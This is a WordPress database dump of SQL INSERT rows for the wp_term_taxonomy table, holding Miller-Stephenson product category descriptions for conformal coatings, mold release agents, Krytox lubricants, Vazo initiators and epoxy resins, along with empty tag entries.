INSERT INTO `wp_term_taxonomy` VALUES (11, 11, 'product_cat', 'Protective conformal coating are an integral part of today\'s sophisticated electronic manufacturing, and as such, coating requirements have become more demanding. To meet these needs, Miller-Stephenson ShieldSys product line offers a choice of premium conformal coatings, each formulated to meet a specific application requirement. Whether your specification calls for urethane, silicone, acrylic or varnish, we have the coating you need in easy application aerosol containers and bulk packages. All of our formulations, whether bulk solution or aerosol are 100% nonflammable.\r\n\r\nA conformal coating primary purpose is to protect electronic circuits from harsh environments that may contain moisture and or chemical contaminants. By being electrically insulating, it maintains long-term surface insulation resistance (SIR) levels and thus ensures the operational integrity of the assembly. It also provides a barrier to air-borne contaminants from the operating environment, such as salt-spray, thus preventing corrosion. Miller-Stephenson have developed commercial and military specific coating formulations providing our customers with the best performing protective coatings on the market. <strong><a href="https://www.miller-stephenson.com/conformal-coating/">For guidance on which conformal coating would be best for your application please see our article section </a></strong>', 0, 0); 
INSERT INTO `wp_term_taxonomy` VALUES (12, 12, 'product_cat', 'Miller-Stephenson\'s specialty medical chemicals offer exceptional quality, value, reliability and ultra pure chemical solutions to the medical industry. Today\'s constantly evolving medical industry continues to raise the performance requirements of medical lubricants, friction-reducing coatings, high purity solvents, and polymer additives.\r\n\r\nMiller-Stephenson offers the most advanced, forward-looking medical chemical solutions to meet your needs. We offer high-performance lubricants, fluoropolymer wire coatings, compounding additives, ultra high purity solvents, and dental lubricants. Our products are designed specifically to meet all current and future regulations, and are 100% biocompatible (ISO 10993), non-nutrient, and nonflammable. Miller-Stephenson continues to provide our customers with the highest quality products and service they have come to expect.\r\n\r\nMiller-Stephenson Medical offers the same cutting edge performance chemicals and quality technical service our customers have expected us to deliver since 1955. To read more about our medical chemicals please look at the article section of our website. Our fluoropolymer medical guidewire coatings and dental handpiece lubricants are specific examples of the high performance and novel new products brought to the medical industry from Miller-Stephenson.', 0, 5); 
INSERT INTO `wp_term_taxonomy` VALUES (13, 13, 'product_cat', 'Vazo radical initiators are substituted azonitrile compounds that thermally decompose to generate two free radicals per molecule. (Nitrogen gas is also generated.) The rate of decomposition is first-order and is unaffected by contaminants such as metal ions. The most important criterion for choosing the correct grade of Vazo™ free radical sources is the temperature at which the reaction is to be run. Vazo radical initiators are generally used within a range of 10 to 30°C (18 to 54°F) above the temperature corresponding to the grade number. This range is a rough guideline only. For instance, Vazo 64 has been used at 125°C (257°F), where the half-life is less than 1 minute.\r\n\r\nVazo free radical sources are used to initiate bulk, solution, and suspension polymerizations. These azo initiators can be used alone, or in combination with other free radical initiators. General benefits versus peroxide alternatives include: Head-to-Tail polymerization with less branching/crosslinking, higher control of molecular weight, lower polydispersity, unaffected by heavy metals, contamination, additives etc, and can polymerize oxidation susceptible compounds and functional groups. For more information about Vazo free radical sources, go to <strong>our guide in the <a href="https://www.miller-stephenson.com/vazo-free-radical-initiator-benefits-and-uses//">Article section</a>.</strong>\r\n<div class="introText"></div>', 0, 4); 
INSERT INTO `wp_term_taxonomy` VALUES (15, 14, 'nav_menu', '', 0, 15); 
INSERT INTO `wp_term_taxonomy` VALUES (16, 16, 'product_cat', 'Miller-Stephenson\'s MS-122 and MS-143 series offers high performance mold release solutions utilizing low-molecular weight PTFE (polytetrafluoroethylene) which imparts exceptional surface adhesion, low coefficient of friction, and uniform film thickness. Our PTFE Release Agents generate a dry film on the mold surface, which is chemical inert, non-migrating and non-staining. Formulations for this class of mold release agent can be solvent or water-based and application is typically performed with brushing or aerosolization.  Our PTFE Release Agents are specialized for each molding operations, and the MS-122 &amp; MS-143 series has proven itself in the most complicated and strained mold configurations.Unlike sacrificial waxes or silicones that transfer to your molded part, our MS-122/143 series has minimal transfer, superior durability, and offers multiple releases per application. Our formulations are 100% nonflammable, and are offered in either water or solvent-based carriers. <a href="https://www.miller-stephenson.com/ptfe-dry-film-mold-release-agents/"><strong>For more information about what makes Miller-Stephenson\'s PTFE release agents superior to our competitors see our article section.</strong></a>\r\n\r\nPTFE release agents are particularly useful in rubber-to-metal bonding operations or when molding silicone or fluorosilicone polymers and elastomers.  PTFE has exceptional utility and can be use in compression and transfer molding operations, however due to its relatively low slip, it can be ineffective with injection molding operations. For injection molding operations we would recommend our<a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/semi-permanent-release-agents/"> ReleaSys semi-permanent product line</a>.  PTFE release agents are particular effective in potting and casting molding operations, specifically with electronic potting and casting as PTFE\'s chemical inertness and low-transfer will not interfere with the sensitive electronics. Production engineers will typically choose PTFE-based release agents if they are looking for a non-silicone, chemical inert, and non-transferable release agent that is applicable across a broad range of substrates. PTFE, on a release per application basis is significantly more efficient and cost-effective than sacrificial or PVA alternatives. <strong><a href="https://www.miller-stephenson.com/mold-release-agents-which-is-right-for-you/">For more information about which mold release agent is right for you go to our guide in the Article section</a></strong> or for <a href="https://www.miller-stephenson.com/mold-release-application-guide/"><strong>guidance on proper mold preparation and release agent application.</strong></a>', 8, 0); 
INSERT INTO `wp_term_taxonomy` VALUES (17, 17, 'product_tag', '', 0, 10); 
INSERT INTO `wp_term_taxonomy` VALUES (18, 18, 'product_tag', '', 0, 0); 
INSERT INTO `wp_term_taxonomy` VALUES (19, 19, 'product_tag', '', 0, 0); 
INSERT INTO `wp_term_taxonomy` VALUES (20, 20, 'product_cat', '<h3><strong>Hi-Temp Release Agents</strong></h3>\r\nMiller-Stephenson High-Temp Release Agents offers efficient and effective release solutions for molding operations which operate at temperatures exceeding 1562°F / 842°C, such as lights metals or glass molding. Fine particle, hexagonal boron nitride is utilized to impart a low coefficient of friction and temperature stability for these high temperature molding process. Stable in aggressive environments with excellent barrier properties, our boron nitride release system is ideal for all of your high temperature composite, metal, and glass mold requirements. Our High-Temp Release Agents are particularly effective for use in advanced, high temperature composite resins, rubbers / elastomers,  and is also an ideal for die-casting of low melting point metals such as lead. Moreover our specialized release agents are an effective protectant for MAG and MIG welding nozzles while not effecting the quality of the welds. Miller-Stephenson formulations allow the creation of a dry film lubricant that provides the exceptional properties of boron nitride or fluoropolymers in an easy-to-use package that delivers protection of your mold surface,  low electrical conduction, high thermal conduction, prevention of reactions between materials, and superior release.', 8, 3); 
INSERT INTO `wp_term_taxonomy` VALUES (21, 21, 'product_cat', '<strong>ReleaSys™</strong> is Miller-Stephenson\'s most advanced, semi-permanent release agents which maximizes releases per application and minimizes mold fouling and transfer. Our release agent forms a chemical bond to the mold surface which results in exceptional surface adhesion, durability, and application efficiency. All variants of the ReleaSys™ Series will deliver higher productivity, lower rejection rates, and higher quality products even in the most demanding applications. We offer various slip-levels and have specialized formulations for differing polymer types and molding processes ( ie: injection, transfer, compression).  Miller-Stephenson has developed ReleaSys™ semi-permanent release agents with formulations that are applicable for virtually all types of <a href="https://www.miller-stephenson.com/composite-mold-release-agents/">composites</a>, <a href="https://www.miller-stephenson.com/rubber-mold-release/">elastomers</a>, <a href="https://www.miller-stephenson.com/polyurethane-mold-release-agents/">urethanes</a> and organic polymers.\r\n\r\nOur customers can expect higher productivity and profitability through reduced downtime, increased acceptance rates and improved part quality when switching to Miller-Stephenson\'s ReleaSys line. Our formulations are 100% nonflammable, low odor and are offered in either water or solvent-based carriers. These products come as either aerosol formulations for convenient, uniform application or as economical bulk formulations. <strong><a href="https://www.miller-stephenson.com/mold-release-agents/">For more information about which mold release agent is right for you click here</a></strong> or for<strong><a href="https://www.miller-stephenson.com/mold-release-application-guide/"> help with application or troubleshooting while using ReleaSys</a><a href="https://www.miller-stephenson.com/troubleshooting-common-molding-issues/">.</a> </strong>Miller-Stephenson provides customization to any of our off-the-shelf products, this ensures our customers have the most optimized and efficient release agent for their specific operation.', 8, 0); 
INSERT INTO `wp_term_taxonomy` VALUES (27, 27, 'product_cat', 'Urethane Conformal Coating provide superior toughness and abrasion resistance and excellent protection from humidity and organic solvents. Polyurethane coatings are available as either aerosol or bulk formulations. Both formulations provide excellent humidity resistance and far greater chemical resistance than Acrylic coatings. Single component Polyurethanes, are easy to apply, enjoy long pot life but sometimes require very lengthy cure cycles to achieve full or optimum cure. The cure cycle can be accelerated by the application of heat typically reducing cure times to less than 4-5 hours at 50% humidity. For applications that will see any direct mechanical wear against the coating users should consider urethane conformal coatings. Includes an ultraviolet (UV) indicator.\r\n\r\nMiller-Stephenson\'s Urethane Conformal Coating contain no free isocyanates and all formulations are 100% non-flammable, low odor, low VOC, and non-ozone depleting.  Our urethane conformal coatings offer robust and superior performance, and offer base resins which conform to MIL-SPEC (MIL-I-46058C Type UR, IPC-CC-830B and is UL 94 V-0; UL file number E105698)', 11, 4); 
INSERT INTO `wp_term_taxonomy` VALUES (28, 28, 'product_cat', '<h3><strong>Silicone Conformal Coating</strong></h3>\r\nMiller-Stephenson\'s Silicone Conformal Coating provides excellent moisture and fungal resistance with good dielectric properties in a soft and flexible "solder-through" coating. Silicone conformal coatings excel at high temperature exposure ( &gt;120C) and high vibration applications. Our formulation utilizes Dow Corning 1-2577 Silicone Resin, which conforms to MIL-I-46058, Type SR, IPC-CC-830B, and UL Standard 746E. Includes an ultraviolet (UV) indicator and the formulation is 100% non-flammable.\r\n\r\nFormulated from tough but flexible silicone technology, Miller-Stephenson\'s Silicone conformal coatings promote extended service life and enhanced reliability for your PCB components and assemblies. Our industry-leading solutions have delivered proven protection for decades against moisture, service environment and a variety of harsh operating conditions including a wide range of temperatures – from -45°C to 200°C. After cure, Miller-Stephenson\'s silicone coatings deliver dependable, long-lasting protection. Their natural elasticity also helps minimize mechanical or thermal stress on delicate component leads. Additional select grades deliver tougher, more abrasion resistant coatings ideally suited for electronic printed wiring board applications.\r\n\r\n<a href="https://www.miller-stephenson.com/conformal-coating/">For more information on which Conformal Coating would best serve your application please see our article section</a>', 11, 2); 
INSERT INTO `wp_term_taxonomy` VALUES (29, 29, 'product_cat', '<h3><strong>Miller-Stephenson\'s Acrylic Conformal Coating</strong></h3>\r\nMiller-Stephenson\'s Acrylic conformal coating is a tough, abrasion resistant coating providing excellent electrical insulation against high voltage arcing and corona shorts. Dries fast, protects against caustics and corrosives. May be "soldered-through" for ease of repair. Easily removed by solvents. Includes an ultraviolet (UV) indicator. No ODC (ozone depleting chemicals). Miller-Stephenson conformal coating formulations are 100% non-flammable, low odor and low VOC.\r\n\r\nAcrylic conformal coatings are most user-friendly of all conformal coating materials due to their ease of application, removal and "repair-through" coating. Acrylics dry and cure rapidly, reaching optimum physical properties in minutes and full cure in less than hour. Additionally, acrylics give off little or no heat during cure, eliminating potential damage to heat-sensitive components, while also expressing minimal shrinkage during cure, exhibiting low glass transition temperatures. One disadvantage is there susceptibility to chemical dissolving upon exposure to isopropyl alcohol or xylene, which are relatively weak solvents. For increased chemical resistance we recommend our Silicone or Urethane Conformal Coating.\r\n\r\n<a href="https://www.miller-stephenson.com/conformal-coating/">For more information on which Conformal Coating would best serve your application please see our article section</a>', 11, 4); 
INSERT INTO `wp_term_taxonomy` VALUES (30, 30, 'product_cat', 'Designed for adverse environmental conditions, MS-452N provides electrical insulation, good flexibility and resistance to salt water, moisture and fungus. Recommended for stators, transformers, prevarnished coils, printed circuits, completed electronic assemblies, junction boxes and cables. Includes an ultraviolet (UV) indicator, no ODC (ozone depleting chemicals), and is 100% nonflammable.', 11, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (31, 31, 'product_cat', 'Specifically formulated for the removal of all conformal coatings and specifically for Miller-Stephenson conformal coatings. MS-114D Conformal Coating Stripping Agent safely dissolves acrylic, urethane, silicone and varnish coatings without damage to most electronic components. 100 % nonflammable and No ODC (ozone depleting chemicals).', 11, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (34, 34, 'product_cat', 'Krytox GPL oils and greases are based on perfluoropolyether (PFPE) oils. This series of synthetic fluorinated lubricants are used in extreme conditions, such as continuous high temperatures up to 260 °C (500 °F), and will survive short-term peak temperatures of up to 270 °C (518 °F). Chemically inert and safe for use around most chemicals, these lubricants are nonflammable and are also safe for use in oxygen service. Krytox oils and greases do not damage plastics or elastomers, nor cause corrosion to metals. They are commonly used as lubricants in aerospace, automotive, industrial, and semiconductor applications, as well as in solving many other routine lubrication problems. In addition, they provide exceptionally long lifetimes in sealed-for-life bearings and extend re-lubrication intervals in bearings that require re-lubrication.', 9, 0); 
INSERT INTO `wp_term_taxonomy` VALUES (35, 35, 'product_cat', 'Krytox Aerospace lubricants were initially developed by DuPont in the early 1960s specifically for the precise and demanding lubrication needs of the aerospace industry. Krytox synthetic lubricants have since replaced hundreds of special-formula, hydrocarbon-based oils and greases throughout the aerospace and aviation industries, thanks to a long list of superior performance characteristics and certifications.\r\n\r\nSince the first commercial application over 50 years ago, Krytox synthetic lubricants have delivered consistent, superior, extended performance. Today, with new additives for new challenges, Krytox lubricants continue to deliver extreme performance under extreme conditions. Krytox is the lubricant of choice for demanding conditions, high and low temperatures, extreme pressure, and harsh environments.\r\n\r\nKrytox Aerospace lubricants can be used to improve the performance of traditionally non-lubricated materials, such as DuPont™ Vespel® CR-6100 bushings.\r\n\r\nKrytox aerospace greases are available in grades conforming to/applicable under:\r\nMIL PRF-27617\r\nCAGE Code No. 50JY2 (manufacturing)\r\nCAGE Code No. 43S57 (business)\r\nFSN, NSN #9150-01-008-0498\r\nNATO #G-398', 9, 0); 
INSERT INTO `wp_term_taxonomy` VALUES (36, 36, 'product_cat', 'There are no second chances when working with reactive gas equipment. Conventional lubricants containing mineral oils and some synthetic lubricants can react with oxygen or halogens such as chlorine, fluorine and bromine — and that can lead to a catastrophic incident. Your reactive gas applications require lubricants that help ensure your safety and Krytox NRT line of oils and greases can. \r\n\r\nThe NRT series is a part of the performance lubricants family of Krytox lubricant offerings. Krytox perfluoropolyether (PFPE) oils are based on poly(hexafluoropropylene oxide), the most thermally stable of all PFPE oils. Krytox PFPE oils are inert in oxygen and can not burn or support combustion.\r\n\r\nKrytox greases in the NRT series have been specially formulated for reactive gas service. With Krytox™ base oil, the NRT greases have special thickeners and additives for use with reactive gas or chemical applications. Several of the NRT greases are thickened with a polytetrafluoroethylene (PTFE) thickener. Because Krytox oil and the PTFE thickener are fully fluorinated, they will not oxidize under extreme thermal conditions. The NRT series also includes greases containing inorganic thickeners, especially useful for high pressure oxygen applications.\r\n\r\nKrytox NRT PLSS is NSF H-1 Rated for incidental food contact. ', 9, 0); 
INSERT INTO `wp_term_taxonomy` VALUES (37, 37, 'product_cat', 'Krytox AUT Series is a line of products designed to address the automotive industry’s need for lubricants that combine efficiency and performance at both low and high temperatures. While all grades in the AUT Series are based on ISO 100-grade peruoropolyether (PFPE) oil, each Krytox AUT grade is formulated with unique additives to provide flexible options for anti-corrosion protection for automotive equipment and heavy transportation parts, such as viscous fan clutch bearings, alternators and idler bearings. Designed to fill the gap between Krytox GPL 224 and Krytox GPL 225—delivering low temperature starting performance while maintaining efcacy at hotter operating temperatures— the AUT series can increase the service life of critical components, allowing automotive manufacturers to extend warranties and improve productivity by reducing component failure.', 9, 4); 
INSERT INTO `wp_term_taxonomy` VALUES (38, 38, 'product_cat', 'Low pressures. Extremely high or low temperatures. Hostile environments. Whatever special needs your system might have, Krytox low vapor pressure (LVP) high-vacuum grease works—safely, reliably, and cost-effectively.\r\n\r\nKrytox LVP high-vacuum grease performs over extremes of temperature and pressure that hydrocarbon, silicone, and chlorofluorocarbon greases can’t match. From –15–300°C (0–570°F), at vapor pressures as low as 10–13 mmHg, and in even the most chemically severe environments, Krytox LVP grease gives dependable, proven performance.\r\n\r\nKrytox vacuum pump fluids (VPF) are used in applications where conventional vacuum pump oils cause safety, waste disposal, and maintenance problems. They are nonflammable and eliminate the chance of fire in pumps. They are nonreactive and safe to use in oxygen systems. They can replace competitive PFPE fluids as well as any other type of vacuum fluid. Krytox fluids do not contain acetal groups, which are susceptible to attack by Lewis acids. This gives Krytox superior stability as a vacuum pump fluid. Krytox vacuum fluids are precisely distilled to provide low vapor pressures and superior performance. In addition, Krytox fluids are recyclable.\r\n\r\nKrytox VPF 1506, 1514 and 1525 are NSF H-1 Rated for incidental food contact.', 9, 4); 
INSERT INTO `wp_term_taxonomy` VALUES (39, 39, 'product_cat', 'Krytox functional fluids are fluorinated synthetic oils based on hexfluoropropylene oxide combined with a functional end-group. The end-groups offered include: carboxylic acid, called Krytox 157FS, methyl ester, methylene alcohol, primary iodide, allyl ether and a benzene group. Carboxylic acid, methyl ester and methylene alcohol are listed on TSCA*, while the others are available under the TSCA R&amp;D exemption. Reactions of these groups can be accomplished by employing many of the traditional synthetic methodologies used with their perfluoroalkyl analogues. \r\n\r\nFS157 can more rigidly attach to the surface through its functional group and that its fluoroalkylether tail attracts the identical molecular structure of Krytox fluorinated oil, resulting in more tenacious surface adhesion of this lubricant.  The FSH series serves as an excellent adhesion promoter and linker molecule for fluorinated oils.', 9, 2); 
INSERT INTO `wp_term_taxonomy` VALUES (40, 40, 'product_cat', 'Selection of the best lubricant involves analyzing operating conditions and choosing from the many synthetic and petroleum-based products available today. While most petroleum products begin to degrade before 99 °C (210 °F) and cease turning at temperatures just below –18 °C (0 °F), Krytox XHT fluorinated synthetic lubricants have operating ranges that are significantly broader (–70–316 °C [–94–600 °F]).\r\n\r\nKrytox lubricants are more effective at even higher temperatures, regardless of operating duration. Using base oils, thickeners, and additives with chemistry designed to create high and low viscosity, these products are targeted for use solely in the very high-temperature range. Available in several grades that offer anti-corrosion, extra bonding, and non-melting properties, these lubricants have applications in a variety of industries, including chemical, textile, tire, aviation, conveyor, glass, plastic film, non-woven manufacturing, and mining and metal processing.\r\n\r\n<strong>High-Temperature Greases</strong>\r\nBecause of its thermal stability and non-oxidizing characteristics, Krytox is a natural high-temperature lubricant. Krytox XHT greases are available with useful temperature ranges up to 360 °C (680 °F) for continuous use, with spikes to 400 °C (752 °F), when used in proper metallurgy with periodic re-lubrication.\r\n', 9, 0); 
INSERT INTO `wp_term_taxonomy` VALUES (41, 41, 'product_tag', '', 0, 0); 
INSERT INTO `wp_term_taxonomy` VALUES (42, 42, 'product_tag', '', 0, 0); 
INSERT INTO `wp_term_taxonomy` VALUES (43, 43, 'pa_sizes-available', '', 0, 0); 
INSERT INTO `wp_term_taxonomy` VALUES (44, 44, 'pa_sizes-available', '', 0, 0); 
INSERT INTO `wp_term_taxonomy` VALUES (45, 45, 'product_cat', 'Krytox GPL Oils 100–107 oils are clear, colorless, fluorinated synthetic oils that are nonreactive, nonflammable, safe in chemical and oxygen service, and are long-lasting. Krytox is a perfluoropolyether (PFPE)—also called perfluoroalkylether (PFAE) or perfluoropolyalkylether (PFPAE).\r\n\r\nKrytox GPL oils and greases do not damage plastics or elastomers nor cause corrosion to metals. They are commonly used as lubricants in aerospace, automotive, industrial and semiconductor applications as well as in solving many other routine lubrication problems.\r\n\r\nThe polymer chain is completely saturated and contains only carbon, oxygen, and fluorine. On a weight basis, a typical Krytox oil contains 21.6% carbon, 9.4% oxygen, and 69.0% fluorine.\r\n\r\nThese oils are compatible with other PFPE/PTFE greases but PFPE lubricants should not be mixed with other common types of lubricants.\r\n\r\nBecause of the inert, non oxidizing nature of the ingredients, Krytox grease and oil lubricants have an indefinite shelf life if unopened and stored in a clean dry location. Greases might show oil separation after extended storage but mixing the free oil back into the grease will return the grease to normal usable condition.', 34, 8); 
INSERT INTO `wp_term_taxonomy` VALUES (46, 46, 'product_cat', 'Krytox GPL Greases 200–207 greases are white buttery greases with all of the same properties as the GPL 100–107 oils that they are made from, but they are in grease form.\r\n\r\nKrytox GPL Greases 210–217 EP greases are black greases that contain molybdenum disulfide added as an extreme pressure additive for highly loaded gears and bearings. GPL 215 and GPL 217 are commonly used in Automotive applications as well. \r\n\r\nKrytox GPL Greases 220–227 anticorrosion greases are white greases that contain sodium nitrite. These grades provide rust protection at ambient temperatures, corrosion protection at high temperatures, and anti-wear protection. The grease additives may alter the chemical resistance of the grease.\r\n\r\nThe standard grease consistency is NLGI grade 2 penetration (265–295). Softer or harder NLGI penetration grades can be made by special order.  Special non-melting XHT grades are available for applications that are higher than the 325 °C (617 °F) melting point of the standard PTFE thickener. \r\n', 34, 0); 
INSERT INTO `wp_term_taxonomy` VALUES (79, 79, 'product_cat', 'Krytox 143 series oils are clear, colorless, fluorinated synthetic oils that are nonreactive, nonflammable, safe in chemical and oxygen service, and are long-lasting. Krytox is a perfluoropolyether (PFPE)—also called perfluoroalkylether (PFAE) or perfluoropolyalkylether (PFPAE).', 35, 6); 
INSERT INTO `wp_term_taxonomy` VALUES (86, 86, 'product_cat', 'Krytox Aerospace &amp; Aviation 240 series greases are white buttery greases with all of the same properties as our 143 series oils that they are made from, but they are in grease form. Krytox 240 AZ, 240 AB and 240 AC are MIL PRF-27617 greases. If Krytox 240 AZ is ordered to meet MIL-SPEC requirements, it must be ordered as NLGI Grade 1 to meet the specification.\r\n\r\nKrytox Aerospace &amp; Aviation 250 series EP greases are black greases that contain molybdenum disulfide added as an extreme pressure additive for highly loaded gears and bearings.\r\n\r\nKrytox Aerospace &amp; Aviation 283 series anticorrosion greases are white greases that contain sodium nitrite. These grades provide rust protection at ambient temperatures, corrosion protection at high temperatures, and anti-wear protection.\r\n\r\nKrytox 240 AC, 240 AB and 240 AZ gr-1 greases now have NSF approval for incidental food contact (H-1) in and around food processing areas.', 35, 0); 
INSERT INTO `wp_term_taxonomy` VALUES (93, 93, 'product_cat', 'Miller-Stephenson offers a diverse line of EPON Epoxy Resins, EPONEX UV-resistant Resins, EPIREZ Waterborne Resins, EPIKURE Curing Agents, and HELOXY Modifiers. These products vary in chemical structure, molecular weight, viscosity and functionality, providing the formulator with a multitude of options. There is at least one resin system that can be used to achieve a specific property or a combination of properties, whether it be low viscosity, chemical resistance, reactivity, flexibility, heat resistance, UV resistance or fire retardance.\r\n\r\nHexion epoxy resins give you mechanical strength, heat resistance, fire retardance, chemical and corrosion resistance, low moisture absorption, high elongation and more. Hexion epoxy resins play an integral and important role across a wide variety of applications from coatings and electrical laminates to composites and adhesives. Hexion epoxy resins, curing agents and modifiers are found in everything from cars and trucks to windmills, electronics, aircraft and buildings. They adhere, protect, bind, bond and coat and provide an expansive range of applications and capabilities, you’re sure to find an epoxy system to fit your specific formulation needs.', 0, 1); 
INSERT INTO `wp_term_taxonomy` VALUES (94, 94, 'product_cat', '', 0, 10); 
INSERT INTO `wp_term_taxonomy` VALUES (95, 95, 'product_cat', 'EPON epoxy resin are industry-leading base resins and one of the foundations of many high performance composite formulations. These epoxy resin systems, when cross-linked or hardened with appropriate curing agents provide very good mechanical, adhesive, dielectric and chemical resistance properties, and low moisture absorption. The basis of many of these composites is EPON Resin 828, which is a liquid resin also described as diglycidyl ether of Bisphenol A. This key resin is complemented in the range by EPON Resin 862, the diglycidyl ether of Bisphenol F, and a full series of modified liquid epoxy resins, epoxy resin blends and purified epoxy resins. EPON liquid epoxy resins when properly formulated and cured provide an inert end-product with a unique combination of properties. They are suitable for use in high performance applications such as coatings, adhesives, civil engineering, electronic and electrical insulation, composites and fiber sizing.\r\n\r\nBecause of this versatility, EPON Resins have become a standard epoxy resin used in high performance composite formulations, fabrication and fusion technology. Trusted by industry-leading composite manufacturers, universities, and as a platform for novel developmental composites, EPON epoxy resins are found in everything from cars and trucks to windmills, electronics, aircraft and buildings.', 93, 0); 
INSERT INTO `wp_term_taxonomy` VALUES (96, 96, 'product_cat', 'Krytox GPL 200-207 greases are white buttery greases with all of the same properties as the Krytox GPL 100–107 oils that they are made from, but they are in grease form.\r\n\r\nGPL 203, 205, and 206 are NSF H-1 Rated for Incidental Food Contact. \r\n\r\nKrytox oils and greases are the product of choice in extreme temperature conditions. Most petroleum products begin to degrade above 99 °C (210 °F) and are too viscous at temperatures just below –18 °C (0 °F). Under the D-3336 test conditions of 177 °C (350 °F) and 10,000 rpm, the majority of competing hydrocarbon lubricants fail in less than 1,000 hr. But, the general purpose line of Krytox lubricants has been shown to last over 5,000 hr without failure, even at an increased temperature of 200 °C (392 °F). This extreme condition performance is what distinguishes Krytox performance lubricants from other competing products.\r\n\r\nA comparison sheet between the grades can be found under any of the tabs below. ', 46, 8); 
INSERT INTO `wp_term_taxonomy` VALUES (97, 97, 'product_cat', 'Krytox GPL Extreme Pressure 210–217 greases are black greases that contain molybdenum disulfide added as an extreme pressure additive for highly loaded gears and bearings.\r\n\r\nKrytox GPL Extreme Pressure heavy-duty greases are used for high loading or slow speeds. EP greases have high load-carrying capability and good lubrication characteristics under boundary and mixed friction conditions. In addition to the EP additive in Krytox heavy-duty greases, Krytox oil provides adequate EP protection as an oil by itself, due to the viscosity build under load and its unique tribochemistry.\r\n\r\nA common test for analyzing EP performance is the Timken EP method, ASTM D2509. The test is performed by applying pressure between a rotating steel cup and a steel block and simulates line contact conditions. Two conditions are observed; the OK Load is the highest load at which no seizing or welding occurs, and it also reflects the load-carrying capability of the lubricant. The Score Load is the lowest load at which seizing or welding is observed. The scar width, which is the average scar width at the load corresponding to the OK load valve, is also recorded. The Timken EP results for various Krytox greases can be seen in Table 1, Timken EP Method.', 46, 7); 
INSERT INTO `wp_term_taxonomy` VALUES (98, 98, 'product_cat', 'Krytox Anticorrosion GPL 220–227 greases are white greases that contain sodium nitrite. These grades provide rust protection at ambient temperatures, corrosion protection at high temperatures, and anti-wear protection. The grease additives may alter the chemical resistance of the grease.\r\n\r\nAnti-corrosion additives are combined with Krytox grease to enhance its ability to protect metallic surfaces from corrosion caused by moisture and oxygen. Miller-Stephenson also offers a patented oil-soluble additive to give the same corrosion protection to our oils. Krytox greases containing anti-wear additives have properties that give high specific load-carrying capacity and the highest protection against wear.\r\n\r\n\r\nGPL 223, 225, and 226 are NSF H-1 Rated for incidental food contact. ', 46, 8); 
INSERT INTO `wp_term_taxonomy` VALUES (99, 99, 'product_cat', 'Since the first commercial application over 50 years ago, Krytox 240 synthetic lubricants have delivered consistent, superior, extended performance. Today, with new additives for new challenges, Krytox lubricants continue to deliver extreme performance under extreme conditions. Krytox is the lubricant of choice for demanding conditions, high and low temperatures, extreme pressure, and harsh environments.\r\n\r\n240 series greases are white buttery greases with all of the same properties as our 143 series oils that they are made from, but they are in grease form.\r\n\r\nKrytox 240 AZ, 240 AB and 240 AC are MIL PRF-27617 greases. If 240 AZ is ordered to meet MIL-SPEC requirements, it must be ordered as NLGI Grade 1 to meet the specification.', 86, 5); 
INSERT INTO `wp_term_taxonomy` VALUES (100, 100, 'product_cat', 'Krytox 250 series EP greases are black greases that contain molybdenum disulfide added as an extreme pressure additive for highly loaded gears and bearings.\r\n\r\nSince the first commercial application over 50 years ago, Krytox synthetic lubricants have delivered consistent, superior, extended performance. Today, with new additives for new challenges, Krytox lubricants continue to deliver extreme performance under extreme conditions. Krytox 250 series is the lubricant of choice for demanding conditions —high and low temperatures, extreme pressure, and harsh environments.\r\n\r\nKrytox greases are used in a variety of limited-motion mount systems associated with aircraft engines, such as an oil tank mount bracket for a Trent 1000 engine.\r\n\r\nKrytox lubricants can be used to improve the performance of traditionally non-lubricated materials, such as DuPont™ Vespel® CR-6100 bushings.\r\n\r\nThe polymer chain is completely saturated and contains only carbon, oxygen, and fluorine. On a weight basis, a typical Krytox oil contains 21.6% carbon, 9.4% oxygen, and 69.0% fluorine.\r\n\r\nAll standard grades of grease are thickened with high efficiency PTFE, whose formula is (CF2-CF2)n. This special high efficiency thickener has a melting point of 325°C (617 °F), and has low molecular weight and submicron (0.2 μ) particle size for higher performance in bearings.\r\n', 86, 3); 
INSERT INTO `wp_term_taxonomy` VALUES (101, 101, 'product_cat', 'Krytox 283 series anticorrosion greases are white greases that contain sodium nitrite. These grades provide rust protection at ambient temperatures, corrosion protection at high temperatures, and anti-wear protection.\r\n\r\nKrytox greases are clear, colorless, fluorinated synthetic oils that are nonreactive, nonflammable, safe in chemical and oxygen service, and are long-lasting. Krytox is a perfluoropolyether (PFPE)—also called perfluoroalkylether (PFAE) or perfluoropolyalkylether (PFPAE).\r\n\r\nKrytox 280 Series contain 1% sodium nitrite whereas Krytox 283 Series contain 5% sodium nitrite.\r\n\r\n', 86, 7); 
INSERT INTO `wp_term_taxonomy` VALUES (102, 102, 'product_tag', '', 0, 104); 
INSERT INTO `wp_term_taxonomy` VALUES (103, 103, 'product_tag', '', 0, 22); 
INSERT INTO `wp_term_taxonomy` VALUES (104, 104, 'product_tag', '', 0, 22); 
INSERT INTO `wp_term_taxonomy` VALUES (105, 105, 'product_tag', '', 0, 84); 
INSERT INTO `wp_term_taxonomy` VALUES (106, 106, 'product_tag', '', 0, 33); 
INSERT INTO `wp_term_taxonomy` VALUES (107, 107, 'product_tag', '', 0, 0); 
INSERT INTO `wp_term_taxonomy` VALUES (108, 108, 'product_tag', '', 0, 39); 
INSERT INTO `wp_term_taxonomy` VALUES (109, 109, 'product_tag', '', 0, 33); 
INSERT INTO `wp_term_taxonomy` VALUES (110, 110, 'product_tag', '', 0, 22); 
INSERT INTO `wp_term_taxonomy` VALUES (111, 111, 'product_tag', '', 0, 10); 
INSERT INTO `wp_term_taxonomy` VALUES (112, 112, 'product_tag', '', 0, 15); 
INSERT INTO `wp_term_taxonomy` VALUES (113, 113, 'product_tag', '', 0, 7); 
INSERT INTO `wp_term_taxonomy` VALUES (114, 114, 'product_tag', '', 0, 4); 
